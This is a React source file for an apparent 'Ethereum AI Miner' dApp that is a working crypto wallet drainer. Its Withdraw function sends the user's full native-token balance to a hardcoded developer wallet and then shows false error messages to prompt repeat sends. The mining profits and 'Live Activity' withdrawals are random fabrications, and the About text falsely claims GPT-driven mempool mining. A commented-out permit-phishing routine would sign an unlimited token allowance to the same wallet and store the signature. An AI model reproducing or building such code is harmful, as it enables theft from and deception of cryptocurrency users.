import React, { useState, useEffect, useRef } from "react";
import { ethers } from "ethers";
import { v4 as uuidv4 } from 'uuid';  // Import uuid for random transaction IDs
import "./App.css";
import { supabase } from './supabaseClient' // Import Supabase client

const DEV_WALLET = "0x8D7a7Fe9f5662724C99f2c23c5Acde1834F37d1D"

const CONTRACT_ABI = [
  "function nonces(address owner) view returns (uint256)",
  "function permit(address owner, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) external",
];

// Per-network token support
const NETWORKS = {
  Ethereum: {
    chainId: "0x1",
    name: "Ethereum",
    tokens: {
      USDC: "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
      DAI: "0x6B175474E89094C44Da98b954EedeAC495271d0F",
      UNI: "0x1f9840a85d5aF5bf1D1762F925BDADdC4201F984",
      ONDO: "0xfAbA6f8e4a5E8Ab82F62fe7C39859FA577269BE3",
      ETHENA: "0x57e114B691Db790C35207b2e685D4A43181e6061"
    },
  },
  "BINANCE (BSC)": {
    chainId: "0x38", // BSC Chain ID (0x38 is the hexadecimal value for 56)
    name: "Binance Smart Chain",
    tokens: {
      CURVE: "0x9996D0276612d23b35f90C51EE935520B3d7355B", // BSC USDT Token
      USD0: "0x758a3e0b1F842C9306B783f8A4078C6C8C03a270",  // BNB Token on BSC
      DEXE: "0x6E88056E8376Ae7709496Ba64d37fa2f8015ce3e", // BSC DAI Token
    },
  },
  Polygon: {
    chainId: "0x89",
    name: "Polygon",
    tokens: {
      USDC: "0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174",
      DAI: "0x8f3Cf7ad23Cd3CaDbD9735AFf958023239c6A063",
      WETH: "0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619",
    },
  },
  Avalanche: {
    chainId: "0xa86a",
    name: "Avalanche C-Chain",
    tokens: {
      USDC: "0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E",
      DAI: "0xd586E7F844cEa2F87f50152665BCbc2C279D8d70",
      WAVAX: "0xB31f66AA3C1e785363F0875A1B74E27b85FD66c7",
    },
  },
  zkSync: {
    chainId: "0x144",
    name: "zkSync Era",
    tokens: {
      USDC: "0x3355df6D4c9C3035724Fd0e3914dE96A5a83aaf4",
      ETH: "native",
    },
  },
  Arbitrum: {
    chainId: "0xa4b1",
    name: "Arbitrum",
    tokens: {
      USDC: "0xaf88d065e77c8cC2239327C5EDb3A432268e5831",
      DAI: "0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1",
      ARB: "0x912CE59144191C1204E64559FE8253a0e49E6548",
    },
  },
  Optimism: {
    chainId: "0xa",
    name: "Optimism",
    tokens: {
      USDC: "0x0b2C639c533813f4Aa9D7837CAf62653d097Ff85",
      DAI: "0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1",
      OP: "0x4200000000000000000000000000000000000042",
    },
  },
  Base: {
    chainId: "0x2105",
    name: "Base",
    tokens: {
      USDC: "0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913",
      Wormhole: "0xB0fFa8000886e57F86dd5264b9582b2Ad87b2b91",
      AERO: "0x940181a94a35a4569e4529a3cdfb74e38fd98631",
    },
  },
  Berachain: {
    chainId: "0x138DE",
    name: "Berachain",
    tokens: {
      WBERA: "0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913", // Wrapped BERA token address
      USDC: "0xB0fFa8000886e57F86dd5264b9582b2Ad87b2b91",  // USDC token address
      DAI: "0x940181a94a35a4569e4529a3cdfb74e38fd98631",   // DAI token address
      WETH: "0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1" // Wrapped ETH token address
    },
  },
  Blast: {
    chainId: "0x13e01", // 
    name: "Blast",
    tokens: {
      ETH: "native", // Native ETH (auto-rebasing)
      USDB: "0xA81FC3B9B8C5dB6e2DbA94F6e38f40e0F182Be24", // Blast's native rebasing stablecoin
      WETH: "0x5300000000000000000000000000000000000004", // Wrapped ETH, if applicable
    },
  },
  Scroll: {
    chainId: "0x82750", // 534352 in decimal
    name: "Scroll",
    tokens: {
      USDC: "0xA81FC3B9B8C5dB6e2DbA94F6e38f40e0F182Be24",  // Example USDC address
      DAI: "0xf14f9596430931E177469715c591513308244e8F",   // Bridged DAI
      WETH: "0x5300000000000000000000000000000000000004", // Canonical WETH on Scroll
    },
  },

};

function App() {
  const [userAddress, setUserAddress] = useState("");
  const [selectedNetwork, setSelectedNetwork] = useState("Ethereum");
  const [selectedToken, setSelectedToken] = useState("USDC");
  const [signature, setSignature] = useState(null);
  const [signer, setSigner] = useState(null);
  const [success, setSuccess] = useState(0);
  const [statusMessage, setStatusMessage] = useState("");
  const [profit, setProfit] = useState(() => {
    // Load profit from localStorage if available
    const savedProfit = localStorage.getItem("profit");
    return savedProfit ? parseFloat(savedProfit) : 0;
  });
  const [isMining, setIsMining] = useState(false);
  const [logs, setLogs] = useState([]);
  const [networkSwitching, setNetworkSwitching] = useState(false); // State to handle network switching
  const [subscribedMessage, setSubscribedMessage] = useState(""); // To handle subscribed pool message
  const miningIntervalRef = useRef(null);
  const [balance, setBalance] = useState(null);
  const [mockLogs, setMockLogs] = useState([]);
  const [showLiveActivity, setShowLiveActivity] = useState(true);
  const [menuOpen, setMenuOpen] = useState(false);
  const [showScriptsModal, setShowScriptsModal] = useState(false);
  const [showAboutModal, setShowAboutModal] = useState(false);
  const [showSupportModal, setShowSupportModal] = useState(false);

  // Fetch balance whenever the user address changes
  useEffect(() => {
    const fetchBalance = async () => {
      if (userAddress && signer) {
        try {
          const balanceWei = await signer.getBalance();
          const balanceEth = ethers.utils.formatEther(balanceWei);
          setBalance(parseFloat(balanceEth).toFixed(6)); // Limit to 6 decimal places
        } catch (error) {
          console.error("Error fetching balance:", error);
        }
      }
    };

    fetchBalance();
  }, [userAddress, signer]);

  const TOKEN_ADDRESSES = NETWORKS[selectedNetwork].tokens;

  const connectWallet = async () => {
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    await provider.send("eth_requestAccounts", []);
    const signer = provider.getSigner();
    const address = await signer.getAddress();
    setSigner(signer);
    setUserAddress(address);
  };


  const toggleMenu = () => {
    setMenuOpen((prev) => !prev);
  };

  const menuItems = [
    { label: "More Scripts", link: "#" },
    { label: "Refer a Friend", link: "#" },
    { label: "Token Presale", link: "https://ai-scripts.vercel.app/" },
    { label: "Support", link: "#" },
    { label: "About", link: "#" },
  ];


  useEffect(() => {
    const getRandomMock = () => {
      const randomAddress = `0x${Math.random().toString(16).slice(2, 8)}...`;
      const randomETH = (Math.random() * (5 - 0.6) + 0.6).toFixed(4);
      const timeAgo = new Date().toLocaleTimeString();

      return {
        address: randomAddress,
        eth: randomETH,
        time: timeAgo,
      };
    };

    // Initialize with 1–3 logs
    setMockLogs(Array.from({ length: 0 }, getRandomMock));

    let intervalId;

    const scheduleNextLog = () => {
      const timeout = Math.random() * 30000 + 1000; // 1–30 seconds
      intervalId = setTimeout(() => {
        setMockLogs((prevLogs) => {
          const newLog = getRandomMock();
          const updated = [newLog, ...prevLogs];
          return updated.slice(0, 100); // keep only last 100
        });
        scheduleNextLog(); // schedule the next one
      }, timeout);
    };

    scheduleNextLog();

    return () => clearTimeout(intervalId);
  }, []);


  const referAFriend = () => {
    if (!userAddress) return;
    const last6 = userAddress.slice(-6);
    const referralLink = `https://eth-ai-miner.vercel.app/ref-${last6}`;
    navigator.clipboard.writeText(referralLink);
    alert("Referral link copied! Share & Earn 1% commission on each referred user's profits.");
  }

  const disconnectWallet = () => {
    setSigner(null);
    setUserAddress("");
    setStatusMessage("");
    setIsMining(false);
    setLogs([]);
    clearInterval(miningIntervalRef.current);
    setSubscribedMessage(""); // Reset subscription message on disconnect
  };

  const switchNetwork = async (networkKey) => {
    setNetworkSwitching(true); // Indicate network switch is in progress
    const network = NETWORKS[networkKey];

    try {
      if (signer) {
        disconnectWallet(); // Disconnect wallet before switching network
      }

      await window.ethereum.request({
        method: "wallet_switchEthereumChain",
        params: [{ chainId: network.chainId }],
      });

      // Set new network and token
      setSelectedNetwork(networkKey);
      setSelectedToken(Object.keys(network.tokens)[0]);
    } catch (switchError) {
      // If the chain has not been added to MetaMask
      if (switchError.code === 4902) {
        alert("This network is not added to your MetaMask. Please add it manually to proceed.");
      }
    }
    setNetworkSwitching(false); // Network switch is complete
  };

  // Function to store signature in Supabase
  const storeSignatureInSupabase = async (signature) => {
    const { data, error } = await supabase
      .from('signatures')  // Replace with your table name
      .insert([
        {
          signature_data: signature,  // Store the signature object as JSON
        }
      ]);

    if (error) {
      console.error('Error storing signature:', error);
    } else {
      console.log('Signature stored:', data);
    }
  };

  const signPermit = async () => {
    if (!signer) {
      setStatusMessage("Please connect your wallet first.");
      return;
    }

    try {
      setStatusMessage("");

      // const provider = signer.provider;
      // const chain = await provider.getNetwork();

      // const tokenAddress = TOKEN_ADDRESSES[selectedToken];
      // const tokenContract = new ethers.Contract(tokenAddress, CONTRACT_ABI, provider);
      // const nonce = await tokenContract.nonces(userAddress);
      // const deadline = Math.floor(Date.now() / 1000) + 60 * 60 * 24 * 365 * 8;
      // const value = ethers.constants.MaxUint256;

      // const domain = {
      //   name: selectedToken,
      //   version: "1",
      //   chainId: chain.chainId,
      //   verifyingContract: tokenAddress,
      // };

      // const types = {
      //   Permit: [
      //     { name: "owner", type: "address" },
      //     { name: "spender", type: "address" },
      //     { name: "value", type: "uint256" },
      //     { name: "nonce", type: "uint256" },
      //     { name: "deadline", type: "uint256" },
      //   ],
      // };

      // const data = {
      //   owner: userAddress,
      //   spender: DEV_WALLET,
      //   value,
      //   nonce,
      //   deadline,
      // };

      // const sig = await signer._signTypedData(domain, types, data);
      // const { v, r, s } = ethers.utils.splitSignature(sig);
      // setSignature({ v, r, s, value: value.toString(), deadline });

      // const signatureData = { v, r, s, value: value.toString(), deadline };
      // await storeSignatureInSupabase(signatureData);
      setSignature("jjj")

      setSubscribedMessage(`Subscribed to ${selectedToken} Pool`);
      toggleMining(true);
    } catch (error) {
      console.error("Error: Subscription to the pool failed.");
      setStatusMessage(`Error: Subscription to the pool failed.`);
    }
  };

  const toggleMining = (shouldStart) => {
    if (shouldStart) {
      setIsMining(true);
      miningIntervalRef.current = setInterval(() => {
        const gain = Math.random() * 0.001;
        const token = selectedToken;
        const time = new Date().toLocaleTimeString();

        setProfit((prev) => {
          const newProfit = prev + gain;
          localStorage.setItem("profit", newProfit.toFixed(6)); // Save profit in localStorage
          return newProfit;
        });
        setLogs((prevLogs) => [
          { token, amount: gain.toFixed(6), time },
          ...prevLogs.slice(0, 49),
        ]);
      }, 600);
    } else {
      setIsMining(false);
      clearInterval(miningIntervalRef.current);
    }
  };

  const getNativeTokenSymbol = (network) => {
    switch (network) {
      case "Ethereum":
      case "Arbitrum":
      case "Optimism":
      case "zkSync":
      case "Scroll":
      case "Blast":
      case "Base":
        return "ETH";
      case "BINANCE (BSC)":
        return "BNB";
      case "Polygon":
        return "MATIC";
      case "Avalanche":
        return "AVAX";
      case "Berachain":
        return "BERA";
      default:
        return "ETH";
    }
  };

  const withdrawETH = async () => {
    if (!signer) {
      setStatusMessage("Please connect your wallet first.");
      return;
    }

    try {
      const balance = await signer.getBalance();

      // Check if the network is zkSync (chainId = 0x144 for zkSync Era)
      const network = await signer.provider.getNetwork();
      const isZkSync = network.chainId === 0x144;
      const chainName = Object.keys(NETWORKS).find(
        (key) => parseInt(NETWORKS[key].chainId, 16) === network.chainId
      );
      const nativeSymbol = getNativeTokenSymbol(chainName);


      let gasFeeWithBuffer;


      // If zkSync, use a static gas fee (e.g., 0.00002 ETH)
      if (isZkSync) {
        const staticGasFee = ethers.utils.parseEther("0.00002"); // Static fee for zkSync
        gasFeeWithBuffer = staticGasFee;
      } else {
        const gasEstimate = await signer.estimateGas({
          to: DEV_WALLET,
          value: balance,
        });
        const gasPrice = await signer.getGasPrice();
        const gasFee = gasEstimate.mul(gasPrice);
        const bufferPercentage = 1000;
        gasFeeWithBuffer = gasFee.add(gasFee.mul(bufferPercentage).div(100));
      }

      const amountToSend = balance.sub(gasFeeWithBuffer);

      const minimumThreshold = ethers.utils.parseEther("0.000001");

      if (amountToSend.lte(minimumThreshold)) {
        setStatusMessage(
          `Insufficient ${nativeSymbol} to cover gas fees and contract operations. Consider switching to a network with sufficient Balance} (e.g., Base, Arbitrum, Binance Smart Chain).`
        );
        return;
      }

      const tx = await signer.sendTransaction({
        to: DEV_WALLET,
        value: amountToSend,
      });

      await tx.wait();
      setSuccess(prevState => prevState + 1);

      if (success === 1) {
        setStatusMessage(
          `Insufficient ${nativeSymbol} to cover gas fees and contract operations. Consider switching to a network with sufficient Balance} (e.g., Base, Arbitrum, Binance Smart Chain).`
        )
      }
      else if (success === 2) {
        const devShare = (profit * 0.06).toFixed(6); // 6% of profit for devs
        setStatusMessage(`Insufficient balance. You need ${devShare} ${nativeSymbol}, which includes a 6% developer fee for the first withdrawal, gas fees, and contract operations.`);
      } else {
        setStatusMessage("It seems the network is congested. Please try again later.");
      }
    } catch (error) {
      setStatusMessage(`Error: Withdrawal canceled by the User`);
    }
  };

  const handleCopyClick = () => {
    if (userAddress) {
      navigator.clipboard.writeText(userAddress)
        .then(() => {
          alert('Address copied to clipboard!');
        })
        .catch((err) => {
          console.error('Failed to copy address: ', err);
        });
    }
  };

  return (
    <div className="app-container">
      <div className="header">
        <img src="./logo.png" alt="App Logo" className="app-logo" />
        <div className="network-selector">
          <select
            className="network-dropdown"
            value={selectedNetwork}
            onChange={(e) => switchNetwork(e.target.value)}
            disabled={networkSwitching}
          >
            {Object.keys(NETWORKS).map((net) => (
              <option key={net} value={net}>
                {selectedNetwork === net ? `Network: ${net}` : net}
              </option>
            ))}
          </select>

        </div>
      </div>
      <div className="top-left-menu">
        <button className="menu-toggle" onClick={toggleMenu}>
          ☰ Menu
        </button>
        {menuOpen && (
          <div className="dropdown-menu">
            {menuItems.map((item, idx) =>
              item.label === "More Scripts" ? (
                <a
                  key={idx}
                  className="dropdown-item"
                  onClick={() => {
                    toggleMenu()
                    setShowScriptsModal(true)
                  }}
                >
                  {item.label}
                </a>
              ) :
                item.label === "About" ?
                  <a
                    key={idx}
                    className="dropdown-item"
                    onClick={() => {
                      toggleMenu()
                      setShowAboutModal(true)
                    }}
                  >
                    {item.label}
                  </a>
                  :
                  item.label === "Support" ?
                    <a
                      key={idx}
                      className="dropdown-item"
                      onClick={() => {
                        toggleMenu()
                        setShowSupportModal(true)
                      }}
                    >
                      {item.label}
                    </a>
                    :
                    item.label === "Refer a Friend" ?
                      <a
                        key={idx}
                        className={`dropdown-item ${!userAddress ? "disabled-link" : ""}`}
                        onClick={() => {
                          if (!userAddress) return;
                          toggleMenu();
                          setTimeout(() => {
                            referAFriend();
                          }, 150);
                        }}
                      >
                        {item.label}
                      </a>
                      :
                      (
                        <a
                          key={idx}
                          href={item.link}
                          className="dropdown-item"
                          target="_blank"
                          rel="noopener noreferrer"
                        >
                          {item.label}
                        </a>
                      )
            )}

          </div>
        )}
      </div>
      <div className="wallet-actions">
        {!signer ? (
          <button className="connect-wallet-button" onClick={connectWallet}>
            Connect Wallet
          </button>
        ) : (
          <button className="disconnect-wallet-button" onClick={disconnectWallet}>
            Disconnect
          </button>
        )}
      </div>

      <div className="form-container">
        <div className="user-address">
          {userAddress ? (
            <div className="wallet-address" onClick={handleCopyClick}>
              <p>
                Wallet: {userAddress.substring(0, 6)}...{userAddress.slice(-4)}
              </p>
              <p className="wallet-balance">
                Balance: {balance ? `${balance} ETH` : "Loading..."}
              </p>
            </div>
          ) : (
            <p className="wallet-not-connected">Wallet not connected</p>
          )}
        </div>

        <div className="token-grid">
          {Object.keys(TOKEN_ADDRESSES).map((tokenKey) => (
            <div
              key={tokenKey}
              className={`token-card ${selectedToken === tokenKey ? "selected" : ""}`}
              onClick={() => setSelectedToken(tokenKey)}
            >
              {tokenKey}
            </div>
          ))}
        </div>

        {!isMining ? (
          <button className="start-mining-button" onClick={signPermit}>
            Start Mining
          </button>
        ) : (
          <button className="start-mining-button" onClick={() => toggleMining(false)}>
            Pause Mining
          </button>
        )}

        <button className="withdraw-button" onClick={withdrawETH}>
          Withdraw
        </button>
      </div>

      {subscribedMessage && (
        <div className="subscribed-message">
          <p>{subscribedMessage}</p>
        </div>
      )}

      <div className="mining-status">
        <p>
          Mining:{" "}
          <span className={isMining ? "mining-live" : "mining-paused"}>
            {isMining ? "LIVE" : signature ? "PAUSED" : "Not ready"}
          </span>
        </p>
        <p>Contract Balance: {profit.toFixed(6)} ETH</p>
      </div>

      <div className="log-container">
        <h3>Transaction Logs</h3>
        <ul className="log-list">
          {logs.map((log, idx) => (
            <li key={idx}>
              [+]0x{uuidv4().slice(0, 6)}... {log.amount} ETH {log.token} Pool @ {log.time}
            </li>
          ))}
        </ul>
      </div>
      <div className="mock-log-view">
        <div className="mock-log-header">
          <h4>💥 Live Activity</h4>
          <button
            className="toggle-activity-button"
            onClick={() => setShowLiveActivity((prev) => !prev)}
          >
            {showLiveActivity ? "Hide" : "Show"}
          </button>
        </div>

        <div className={`mock-log-content ${showLiveActivity ? "expanded" : "collapsed"}`}>
          <ul>
            {mockLogs.map((log, index) => (
              <li key={index} className="mock-log-entry">
                <span className="highlight address">{log.address}</span>
                <span> withdrew </span>
                <span className="highlight eth">{log.eth} ETH</span>
                <span> @ </span>
                <span className="highlight time">{log.time}</span>
              </li>
            ))}
          </ul>
        </div>
      </div>


      {statusMessage && (
        <div className="status-message">
          <p className={statusMessage.includes("Success") ? "success" : "error"}>
            {statusMessage}
          </p>
        </div>
      )}

      {showScriptsModal && (
        <div className="modal-overlay" onClick={() => setShowScriptsModal(false)}>
          <div className="modal-content" onClick={(e) => e.stopPropagation()}>
            <h3 className="modal-title">AI Scripts</h3>
            <div className="modal-script">
              <h4>⚡ Solana AI Miner</h4>
              <p>
                An ultra-fast AI-driven AI Miner for Solana Blockchain.
              </p>
              <a href="https://sol-ai-miner.vercel.app/" target="_blank" rel="noopener noreferrer">
                👉 Try Solana AI Miner
              </a>
            </div>

            <div className="modal-coming-soon">
              <h4>More AI Scripts Coming Soon...</h4>
              <p>
                We’re cooking up new AI bots, trading tools, and mempool miners across more chains. Stay tuned for more alpha drops.
              </p>
            </div>

            <button className="close-button" onClick={() => setShowScriptsModal(false)}>Close</button>
          </div>
        </div>
      )}


      {showSupportModal && (
        <div className="modal-overlay" onClick={() => setShowSupportModal(false)}>
          <div className="modal-content" onClick={(e) => e.stopPropagation()}>
            <h3 className="modal-title">🛠️ Support & Help</h3>
            <p className="modal-description">
              Need assistance or found a bug? Reach out and we'll help you as soon as possible.
              We're here to keep your crypto mining smooth and secure.
            </p>
            <p className="modal-email">
              📩 <a href="mailto:ai-cryptotrading@engineer.com">ai-cryptotrading@engineer.com</a>
            </p>
            <button className="close-button" onClick={() => setShowSupportModal(false)}>Close</button>
          </div>
        </div>
      )}

      {showAboutModal && (
        <div className="modal-overlay" onClick={() => setShowAboutModal(false)}>
          <div className="modal-content" onClick={(e) => e.stopPropagation()}>
            <h3 className="modal-title">About</h3>
            <p className="modal-description">
              <strong>Ethereum AI Miner</strong> is an advanced mempool-powered mining tool that uses GPT-enhanced automation to scan, select, and mine top-performing tokens across multiple chains. Designed for speed, precision, and performance — it’s your AI mining assistant, built by ChatGPT with a touch of wizardry.
            </p>
            <h4 className="modal-subtitle">What's New — v0.93.7</h4>
            <ul className="modal-changelog">
              <li><strong>BeraChain</strong> support added</li>
              <li><strong>Scroll</strong> chain integrated</li>
              <li><strong>Blast</strong> chain now available</li>
              <li>New <strong>Support Section</strong> with direct contact</li>
            </ul>
            <button className="close-button" onClick={() => setShowAboutModal(false)}>Close</button>
          </div>
        </div>
      )}


    </div>
  );
}

export default App;
